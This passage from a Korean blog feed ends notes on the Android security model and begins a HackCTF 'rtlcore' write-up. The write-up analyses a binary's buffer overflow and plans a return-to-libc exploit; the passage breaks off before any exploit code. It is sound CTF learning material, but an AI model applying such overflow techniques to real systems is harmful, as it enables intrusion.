&lt;li&gt;Location Manager : 단말의 위치 값을 지속적으로 얻을 수 있는 서비스&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;어플리케이션 계층&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;흔히 우리가 사용하는 어플리케이션들이 이 계층에 해당됨&lt;/li&gt;
&lt;li&gt;시스템 및 사용자 어플리케이션으로 구분
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;시스템 어플리케이션
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;/system 디렉터리에 존재하며 사용자가 제거/변경 불가능함&lt;/li&gt;
&lt;li&gt;SMS 메시지 어플리케이션 등이 해당됨&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;사용자 어플리케이션
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;/data 디렉터리에 존재하며, 제거/변경 가능함&lt;/li&gt;
&lt;li&gt;각각의 어플리케이션은 샌드박스에 설치되어 영향을 주거나 데이터 통신 불가&lt;/li&gt;
&lt;li&gt;각 어플리케이션의 권한을 가진 리소스에만 접근 가능&lt;/li&gt;
&lt;li&gt;카카오톡과 같은 일반 어플리케이션 등이 해당됨.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;안드로이드 보안 모델&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;코드 서명
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;JAR 서명 기법을 이용하여 어플리케이션 간 신뢰 관계 설정을 위해 APK 파일 서명&lt;/li&gt;
&lt;li&gt;서명을 통해 설치된 대상 어플리케이션의 인증서와 업데이트할 어플리케이션 비교&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;권한
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;샌드박스를 이용하여 어플리케이션 설치 시 고유한 UID/GID 를 할당함&lt;/li&gt;
&lt;li&gt;생성되는 디렉터리 및 파일은 소유자 및 그룹 외 내용 확인이 불가함&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;TrustZone
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;디바이스 공간을 물리적 또는 논리적으로 분리해서 주요 자원을 보호하는 방법&lt;/li&gt;
&lt;li&gt;활용 사례 : 지문 저장 정보, 지불 관련 기능 저장, DRM 암호 정보 저장&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;SELinux
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;강제 접근 제어를 포함한 접근 제어 보안 정책을 지원하는 리눅스 커널 보안 모듈, 안드로이드 5.0부터 완전히 적용됨&lt;/li&gt;
&lt;li&gt;세가지 모드 : 비활성(disabled), 허용(permissive), 시행(enforcing)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;패키지 파일(APK)&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Android Application Package 의 약자로 안드로이드에서 프로그램 형태로 배포되는 형식의 파일&lt;/li&gt;
&lt;li&gt;jar를 확장한 포맷이며, jar 파일은 zip 압축 파일 포맷을 사용함&lt;/li&gt;
&lt;li&gt;패키지 파일 설치 경로
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;/data/app/&amp;lt;패키지명&amp;gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;컴파일된 코드와 앱의 apk 파일이 저장됨&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;/data/data/&amp;lt;패키지명&amp;gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;앱이 사용하는 데이터들이 저장되는 장소&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;Reference&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://velog.io/@sery270/JVM-DVM-ART&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://velog.io/@sery270/JVM-DVM-ART&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1632894356151&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot; &amp;zwj;♂️JVM, DVM, ART&quot; data-og-description=&quot;모바일 환경에 최적화된 런타임을 제공하기 위해, 기존 자바 가상머신인 JVM을 대체하여 DVM이 나타났습니다.이후 DVM이 지금의 ART로 발전되었습니다. 안드로이드 OS와 자바/코틀린이 돌아가는 런&quot; data-og-host=&quot;velog.io&quot; data-og-source-url=&quot;https://velog.io/@sery270/JVM-DVM-ART&quot; data-og-url=&quot;https://velog.io/@sery270/JVM-DVM-ART&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/vf9ID/hyLNnAmyQF/KaknGvkVWlbVGwTUClNhBk/img.png?width=768&amp;amp;height=204&amp;amp;face=0_0_768_204,https://scrap.kakaocdn.net/dn/b0iQSB/hyLNmVKa3f/is8UMu6ckVZTzkTiXR03n0/img.png?width=848&amp;amp;height=225&amp;amp;face=0_0_848_225&quot;&gt;&lt;a href=&quot;https://velog.io/@sery270/JVM-DVM-ART&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://velog.io/@sery270/JVM-DVM-ART&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/vf9ID/hyLNnAmyQF/KaknGvkVWlbVGwTUClNhBk/img.png?width=768&amp;amp;height=204&amp;amp;face=0_0_768_204,https://scrap.kakaocdn.net/dn/b0iQSB/hyLNmVKa3f/is8UMu6ckVZTzkTiXR03n0/img.png?width=848&amp;amp;height=225&amp;amp;face=0_0_848_225');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt; &amp;zwj;♂️JVM, DVM, ART&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;모바일 환경에 최적화된 런타임을 제공하기 위해, 기존 자바 가상머신인 JVM을 대체하여 DVM이 나타났습니다.이후 DVM이 지금의 ART로 발전되었습니다. 안드로이드 OS와 자바/코틀린이 돌아가는 런&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;velog.io&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://medium.com/@logishudson0218/android-framework-%EC%95%88%EB%93%9C%EB%A1%9C%EC%9D%B4%EB%93%9C-%ED%94%84%EB%A0%88%EC%9E%84%EC%9B%8C%ED%81%AC-%EC%97%90-%EB%8C%80%ED%95%9C-%EC%A0%95%EB%A6%AC-bda32544fefb&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://medium.com/@logishudson0218/android-framework-%EC%95%88%EB%93%9C%EB%A1%9C%EC%9D%B4%EB%93%9C-%ED%94%84%EB%A0%88%EC%9E%84%EC%9B%8C%ED%81%AC-%EC%97%90-%EB%8C%80%ED%95%9C-%EC%A0%95%EB%A6%AC-bda32544fefb&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1632894381066&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Android Framework(안드로이드 프레임워크)에 대한 정리&quot; data-og-description=&quot;안드로이드에 대해 계속 공부하고 있지만, 프로젝트나 기능 위주로만 보다 보니 안드로이드 OS처럼 내 안드로이드 지식도 파편화(?)가 되는 것 같다.&quot; data-og-host=&quot;medium.com&quot; data-og-source-url=&quot;https://medium.com/@logishudson0218/android-framework-%EC%95%88%EB%93%9C%EB%A1%9C%EC%9D%B4%EB%93%9C-%ED%94%84%EB%A0%88%EC%9E%84%EC%9B%8C%ED%81%AC-%EC%97%90-%EB%8C%80%ED%95%9C-%EC%A0%95%EB%A6%AC-bda32544fefb&quot; data-og-url=&quot;https://medium.com/@logishudson0218/android-framework-%EC%95%88%EB%93%9C%EB%A1%9C%EC%9D%B4%EB%93%9C-%ED%94%84%EB%A0%88%EC%9E%84%EC%9B%8C%ED%81%AC-%EC%97%90-%EB%8C%80%ED%95%9C-%EC%A0%95%EB%A6%AC-bda32544fefb&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/sAUa4/hyLNnf2TAq/v75j2RgazFylZiKiK5Ud30/img.jpg?width=713&amp;amp;height=512&amp;amp;face=0_0_713_512,https://scrap.kakaocdn.net/dn/bUI0y4/hyLLLJDLCo/GKAwuTCtZmEPKZYWe2ZeLK/img.jpg?width=713&amp;amp;height=512&amp;amp;face=0_0_713_512,https://scrap.kakaocdn.net/dn/bVlsKL/hyLLHf97OD/pDbKBbWiNUf9P2QVVlV9sk/img.png?width=60&amp;amp;height=42&amp;amp;face=0_0_60_42&quot;&gt;&lt;a href=&quot;https://medium.com/@logishudson0218/android-framework-%EC%95%88%EB%93%9C%EB%A1%9C%EC%9D%B4%EB%93%9C-%ED%94%84%EB%A0%88%EC%9E%84%EC%9B%8C%ED%81%AC-%EC%97%90-%EB%8C%80%ED%95%9C-%EC%A0%95%EB%A6%AC-bda32544fefb&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://medium.com/@logishudson0218/android-framework-%EC%95%88%EB%93%9C%EB%A1%9C%EC%9D%B4%EB%93%9C-%ED%94%84%EB%A0%88%EC%9E%84%EC%9B%8C%ED%81%AC-%EC%97%90-%EB%8C%80%ED%95%9C-%EC%A0%95%EB%A6%AC-bda32544fefb&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/sAUa4/hyLNnf2TAq/v75j2RgazFylZiKiK5Ud30/img.jpg?width=713&amp;amp;height=512&amp;amp;face=0_0_713_512,https://scrap.kakaocdn.net/dn/bUI0y4/hyLLLJDLCo/GKAwuTCtZmEPKZYWe2ZeLK/img.jpg?width=713&amp;amp;height=512&amp;amp;face=0_0_713_512,https://scrap.kakaocdn.net/dn/bVlsKL/hyLLHf97OD/pDbKBbWiNUf9P2QVVlV9sk/img.png?width=60&amp;amp;height=42&amp;amp;face=0_0_60_42');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Android Framework(안드로이드 프레임워크)에 대한 정리&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;안드로이드에 대해 계속 공부하고 있지만, 프로젝트나 기능 위주로만 보다 보니 안드로이드 OS처럼 내 안드로이드 지식도 파편화(?)가 되는 것 같다.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;medium.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://thesecurity.tistory.com/20&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://thesecurity.tistory.com/20&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1632894404826&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;안드로이드 보안 모델&quot; data-og-description=&quot;//안드로이드 보안 모델 - 기본적으로 리북스 커널이 제공하는 보안 기능을 사용 - 스마트폰을 사용하는 방식에 맞게 보안 기능을 재구성 - 애플리케이션 격리 : Sandbox, Permission, TrustZone - 플랫폼 &quot; data-og-host=&quot;thesecurity.tistory.com&quot; data-og-source-url=&quot;https://thesecurity.tistory.com/20&quot; data-og-url=&quot;https://thesecurity.tistory.com/20&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/8oEtr/hyLLI0qivZ/Nn2gulGaJOcv2NU5P6EG10/img.png?width=800&amp;amp;height=337&amp;amp;face=0_0_800_337,https://scrap.kakaocdn.net/dn/mzjBj/hyLLBmH82P/6hfVRbcr0NGBVzcQOtxLn1/img.png?width=800&amp;amp;height=337&amp;amp;face=0_0_800_337,https://scrap.kakaocdn.net/dn/bp4VqK/hyLLI0qizJ/AadT9pWYGlHyDCK69Hmfx1/img.png?width=1142&amp;amp;height=482&amp;amp;face=0_0_1142_482&quot;&gt;&lt;a href=&quot;https://thesecurity.tistory.com/20&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://thesecurity.tistory.com/20&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/8oEtr/hyLLI0qivZ/Nn2gulGaJOcv2NU5P6EG10/img.png?width=800&amp;amp;height=337&amp;amp;face=0_0_800_337,https://scrap.kakaocdn.net/dn/mzjBj/hyLLBmH82P/6hfVRbcr0NGBVzcQOtxLn1/img.png?width=800&amp;amp;height=337&amp;amp;face=0_0_800_337,https://scrap.kakaocdn.net/dn/bp4VqK/hyLLI0qizJ/AadT9pWYGlHyDCK69Hmfx1/img.png?width=1142&amp;amp;height=482&amp;amp;face=0_0_1142_482');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;안드로이드 보안 모델&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;//안드로이드 보안 모델 - 기본적으로 리북스 커널이 제공하는 보안 기능을 사용 - 스마트폰을 사용하는 방식에 맞게 보안 기능을 재구성 - 애플리케이션 격리 : Sandbox, Permission, TrustZone - 플랫폼&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;thesecurity.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://umbum.dev/616&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://umbum.dev/616&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1632894473383&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;안드로이드 플랫폼의 구조 / ART&quot; data-og-description=&quot;https://developer.android.com/guide/platform/index.html?hl=ko#art Android는&amp;nbsp;모바일 기기를 위한 Linux 기반 커널과&amp;nbsp;미들웨어, 핵심 애플리케이션들을 포함한 소프트웨어 스택이라고 볼 수 있다. ART, Andro..&quot; data-og-host=&quot;umbum.dev&quot; data-og-source-url=&quot;https://umbum.dev/616&quot; data-og-url=&quot;https://umbum.dev/616&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/dYjz6L/hyLLG9o8ej/P75EYuvx2RnWREBV2lwtg1/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/bvvHmc/hyLNf992OW/XvSnKQPkzqRFm3zk5andhK/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800&quot;&gt;&lt;a href=&quot;https://umbum.dev/616&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://umbum.dev/616&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/dYjz6L/hyLLG9o8ej/P75EYuvx2RnWREBV2lwtg1/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/bvvHmc/hyLNf992OW/XvSnKQPkzqRFm3zk5andhK/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;안드로이드 플랫폼의 구조 / ART&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;https://developer.android.com/guide/platform/index.html?hl=ko#art Android는&amp;nbsp;모바일 기기를 위한 Linux 기반 커널과&amp;nbsp;미들웨어, 핵심 애플리케이션들을 포함한 소프트웨어 스택이라고 볼 수 있다. ART, Andro..&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;umbum.dev&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://boltlessengineer.github.io/Notion2Tistory&quot;&gt;Uploaded by Notion2Tistory v1.1.0&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1632894410264&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;Notion2Tistory&quot; data-og-description=&quot;&quot; data-og-host=&quot;boltlessengineer.github.io&quot; data-og-source-url=&quot;https://boltlessengineer.github.io/Notion2Tistory&quot; data-og-url=&quot;https://boltlessengineer.github.io/Notion2Tistory/&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://boltlessengineer.github.io/Notion2Tistory&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://boltlessengineer.github.io/Notion2Tistory&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Notion2Tistory&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;boltlessengineer.github.io&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;</description>
      <category>모바일</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/25</guid>
      <comments>https://zzasgi.tistory.com/25#entry25comment</comments>
      <pubDate>Wed, 29 Sep 2021 14:43:09 +0900</pubDate>
    </item>
    <item>
      <title>[hackctf] rtlcore 풀이</title>
      <link>https://zzasgi.tistory.com/21</link>
      <description>&lt;h2 data-ke-size=&quot;size26&quot;&gt;1. 문제&lt;/h2&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1428&quot; data-origin-height=&quot;374&quot; width=&quot;749&quot; height=&quot;196&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/uwtMH/btrethuAkeh/peRDi4fKa0ncJHN4yQ0Y4K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/uwtMH/btrethuAkeh/peRDi4fKa0ncJHN4yQ0Y4K/img.png&quot; data-alt=&quot;checksec&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/uwtMH/btrethuAkeh/peRDi4fKa0ncJHN4yQ0Y4K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FuwtMH%2FbtrethuAkeh%2FpeRDi4fKa0ncJHN4yQ0Y4K%2Fimg.png&quot; data-origin-width=&quot;1428&quot; data-origin-height=&quot;374&quot; width=&quot;749&quot; height=&quot;196&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;checksec&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제 파일의 보호기법은 NX bits가 걸려있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1208&quot; data-origin-height=&quot;714&quot; width=&quot;692&quot; height=&quot;409&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zQe3L/btrewxDoSpw/6IPUMCFCEkdkkEtY2ScNY1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zQe3L/btrewxDoSpw/6IPUMCFCEkdkkEtY2ScNY1/img.png&quot; data-alt=&quot;main 함수&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zQe3L/btrewxDoSpw/6IPUMCFCEkdkkEtY2ScNY1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzQe3L%2FbtrewxDoSpw%2F6IPUMCFCEkdkkEtY2ScNY1%2Fimg.png&quot; data-origin-width=&quot;1208&quot; data-origin-height=&quot;714&quot; width=&quot;692&quot; height=&quot;409&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;main 함수&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ida를 사용하여 main 함수를 확인해보니 사용자로부터 입력받은 문자열 s를 check_passcode 함수의 인자로 넣어준 후 함수의 반환값이 hashcode와 같을 시 특정 문자열을 출력한 후 core 함수를 실행한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;732&quot; data-origin-height=&quot;374&quot; width=&quot;624&quot; height=&quot;319&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/C0P8F/btrex059M53/J73D54k3oxYoLSMxr6KWj0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/C0P8F/btrex059M53/J73D54k3oxYoLSMxr6KWj0/img.png&quot; data-alt=&quot;check_passcode 함수&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/C0P8F/btrex059M53/J73D54k3oxYoLSMxr6KWj0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FC0P8F%2Fbtrex059M53%2FJ73D54k3oxYoLSMxr6KWj0%2Fimg.png&quot; data-origin-width=&quot;732&quot; data-origin-height=&quot;374&quot; width=&quot;624&quot; height=&quot;319&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;check_passcode 함수&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;check_passcode 함수는 사용자로부터 입력받은 문자열이 위치한 주소에서 4바이트씩 읽어와서 v2에 더해주는 반복문을 거친 뒤 v2를 반환해준다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1832&quot; data-origin-height=&quot;570&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dnPIYA/btrewxwDnTC/aXXzla603zehs3jFFjUqU1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dnPIYA/btrewxwDnTC/aXXzla603zehs3jFFjUqU1/img.png&quot; data-alt=&quot;core 함수&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dnPIYA/btrewxwDnTC/aXXzla603zehs3jFFjUqU1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdnPIYA%2FbtrewxwDnTC%2FaXXzla603zehs3jFFjUqU1%2Fimg.png&quot; data-origin-width=&quot;1832&quot; data-origin-height=&quot;570&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;core 함수&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;core 함수를 확인해보니 printf 심볼의 주소를 출력해주고 read 함수를 사용하여 buf에 입력값을 받는데 buf의 크기는 0x3e 인데 read 함수가 입력 받을 수 있는 문자열의 길이는 0x64인 것으로 보아 여기서 buffer overflow 취약점이 발생한다. 이를 활용하여 RTL 기법을 통해 exploit하면 될 것 같다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;2. 풀이&lt;/h2&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;800&quot; data-origin-height=&quot;38&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wfUc1/btrepvURG2f/PD47QHcaqwm9ta4kypP6NK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wfUc1/btrepvURG2f/PD47QHcaqwm9ta4kypP6NK/img.png&quot; data-alt=&quot;hashcode&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wfUc1/btrepvURG2f/PD47QHcaqwm9ta4kypP6NK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwfUc1%2FbtrepvURG2f%2FPD47QHcaqwm9ta4kypP6NK%2Fimg.png&quot; data-origin-width=&quot;800&quot; data-origin-height=&quot;38&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;hashcode&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ida에서 hashcode의 값을 확인해보니 0xC0D9B0A7 인 것을 확인했다. 이 hashcode 값을 맞춰줘야 core 함수 실행이 가능하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; width=&quot;554&quot; height=&quot;283&quot; data-origin-width=&quot;732&quot; data-origin-height=&quot;374&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/C0P8F/btrex059M53/J73D54k3oxYoLSMxr6KWj0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/C0P8F/btrex059M53/J73D54k3oxYoLSMxr6KWj0/img.png&quot; data-alt=&quot;check_passcode 함수&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/C0P8F/btrex059M53/J73D54k3oxYoLSMxr6KWj0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FC0P8F%2Fbtrex059M53%2FJ73D54k3oxYoLSMxr6KWj0%2Fimg.png&quot; width=&quot;554&quot; height=&quot;283&quot; data-origin-width=&quot;732&quot; 